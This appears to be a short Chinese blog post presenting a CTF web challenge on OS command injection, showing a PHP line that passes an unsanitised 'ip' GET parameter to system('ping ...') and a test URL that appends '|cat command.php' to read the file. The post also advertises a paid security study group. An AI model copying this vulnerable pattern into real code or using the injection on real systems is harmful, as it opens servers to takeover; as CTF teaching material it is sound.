【CTF WEB】命令执行

 


命令执行

找到题目中的KEY

KEY为八位随机字符数字,例如key:1234qwer。提交1234qwer 即可。

漏洞代码

<?php 
system("ping -c 2 ".$_GET['ip']);
?>

测试方法

http://localhost/command.php?ip=127.0.0.1|cat command.php


===========================================================

一个独立安全研究员,自由职业者的知识星球《公鸡队之家》,一边研究技术,一边分享到星球,一边养活自己,我们都有一颗好为人师的心,赠人玫瑰,手留余香。星球的价格是199¥/年。希望大家赏光,加入二维码在文末。

知识星球
posted @   17bdw  阅读(2035)  评论(0编辑  收藏  举报
编辑推荐:
· 智能桌面机器人:用.NET IoT库控制舵机并多方法播放表情
· Linux glibc自带哈希表的用例及性能测试
· 深入理解 Mybatis 分库分表执行原理
· 如何打造一个高并发系统?
· .NET Core GC压缩(compact_phase)底层原理浅谈
阅读排行:
· DeepSeek火爆全网,官网宕机?本地部署一个随便玩「LLM探索」
· 开发者新选择:用DeepSeek实现Cursor级智能编程的免费方案
· Tinyfox 发生重大改版
· 独立开发经验谈:如何通过 Docker 让潜在客户快速体验你的系统
· 小米CR6606,CR6608,CR6609 启用SSH和刷入OpenWRT 23.05.5
历史上的今天:
2017-09-29 【Python】批量爬取网站URL测试Struts2-045漏洞
点击右上角即可分享
微信分享提示